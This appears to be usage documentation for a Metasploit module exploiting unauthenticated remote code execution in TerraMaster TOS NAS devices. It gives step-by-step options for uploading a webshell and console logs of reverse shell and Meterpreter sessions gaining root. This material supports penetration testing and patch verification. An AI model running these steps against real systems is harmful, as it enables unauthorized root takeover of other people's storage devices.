## Vulnerable Application

This module is exploiting a vulnerability described in [CVE-2020-35665](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35665) or
[CVE-2020-28188](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28188) that allows an unauthenticated attacker to upload a webshell
via shell metacharacters in the `Event` parameter using the vulnerable endpoint `include/makecvs.php` during the `CSV` creation process.
See this [AttackerKB Article](https://attackerkb.com/topics/lXY4yjOvwx/cve-2020-35665) for more details.

Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain
access to the underlying operating system as the user that the web services are running as (typically `root` in case of TerraMaster).

Installing a vulnerable test bed requires a TerraMaster NAS device that can run `TOS 4.x`
This module has been tested against a TerraMaster `F2-221` Model with the specifications listed below:

* TerraMaster F2-221
* CPU: `x86`
* TOS Version: `4.1.27`

## Verification Steps

1. `use exploit/linux/http/terramaster_unauth_rce_cve_2020_35665`
1. `set RHOSTS <TARGET HOSTS>`
1. `set RPORT <port>`
1. `set LHOST <attacker host ip>`
1. `set LPORT <attacker host port>`
1. `set TARGET <0-PHP, 1-Unix command or 2-Linux Dropper>`
1. `exploit`
1. You should get a `bash` shell or `meterpreter` session depending on the `target` and `payload` settings.

## Options

### WEBSHELL
You can use this option to set the filename and extension (should be .php) of the webshell.
This is handy if you want to test the webshell upload and execution with different file names.
to bypass any security settings on the Web and PHP server.

### COMMAND
This option provides the user to choose the PHP underlying shell command function to be used for execution.
The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
This option is only available when the target selected is either Unix Command or Linux Dropper.
For the native PHP target, by default the `eval()` function will be used for native PHP code execution.

## Scenarios

```msf exploit(linux/http/terramaster_unauth_rce_cve_2020_35665) > info

       Name: TerraMaster TOS 4.2.06 or lower - Unauthenticated Remote Code Execution
     Module: exploit/linux/http/terramaster_unauth_rce_cve_2020_35665
   Platform: Unix, Linux
       Arch: cmd, php, x64, x86, aarch64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-12-12

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  IHTeam

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      8181             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Path to Terramaster Web console
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host
  WEBSHELL                    no        Web shell name with extension .php. Name will be randomly generated if left unset.


  When TARGET is not 0:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local    machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  This module exploits an unauthenticated remote code-execution vulnerability in TerraMaster TOS 4.2.06
  and lower via shell metacharacters in the Event parameter at vulnerable endpoint `include/makecvs.php`
  during CSV creation.
  Any unauthenticated user can therefore execute commands on the system under the same privileges as the
  web application, which typically runs under root at the TerraMaster Operating System.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-35665
  https://nvd.nist.gov/vuln/detail/CVE-2020-28188
  https://packetstormsecurity.com/files/160685
  https://packetstormsecurity.com/files/160687
  https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
  https://attackerkb.com/topics/lXY4yjOvwx/cve-2020-35665
```

### TerraMaster F2-210 TOS 4.1.27 - PHP native `php/meterpreter/reverse_tcp` session
```
msf exploit(linux/http/terramaster_unauth_rce_cve_2020_35665) > set target 0
target => 0
msf exploit(linux/http/terramaster_unauth_rce_cve_2020_35665) > exploit

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. TOS version is 4.1.27 and CPU architecture is X64.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 127.0.0.1
[+] Deleted cuckoo.php
[*] Meterpreter session 5 opened (192.168.10.1:4444 -> 192.168.10.2:55766) at 2023-06-05 14:23:14 +0000

meterpreter > sysinfo
Computer    : TerrorMaster
OS          : Linux TerrorMaster 4.13.16 SMP Mon Jun 05 14:23:56 CET 2023 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: root
meterpreter >
```
### TerraMaster F2-210 TOS 4.1.27 - Unix Command `cmd/unix/reverse_bash` session
```
msf exploit(linux/http/terramaster_unauth_rce_cve_2020_35665) > set target 1
target => 1
msf exploit(linux/http/terramaster_unauth_rce_cve_2020_35665) > exploit

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. TOS version is 4.1.27 and CPU architecture is X64.
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted cuckoo.php
[*] Command shell session 6 opened (192.168.10.1:4444 -> 192.168.10.2:54556) at 2023-06-05 14:31:35 +0000

uname -a
Linux TerrorMaster 4.13.16 SMP Mon Jun 05 14:32:13 CET 2023 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)
```
### TerraMaster F2-210 TOS 4.1.27 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
```
msf exploit(linux/http/terramaster_unauth_rce_cve_2020_35665) > set target 2
target => 2
msf exploit(linux/http/terramaster_unauth_rce_cve_2020_35665) > exploit

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. TOS version is 4.1.27 and CPU architecture is X64.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3045348 bytes) to 127.0.0.1
[+] Deleted cuckoo.php
[*] Meterpreter session 7 opened (192.168.10.1:4444 -> 192.168.10.2:46174) at 2023-06-05 14:39:17 +0000
[*] Command Stager progress - 100.00% done (810/810 bytes)

meterpreter > sysinfo
Computer     : 192.168.10.2
OS           :  (Linux 4.13.16)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter >
```

## Limitations
No limitations.
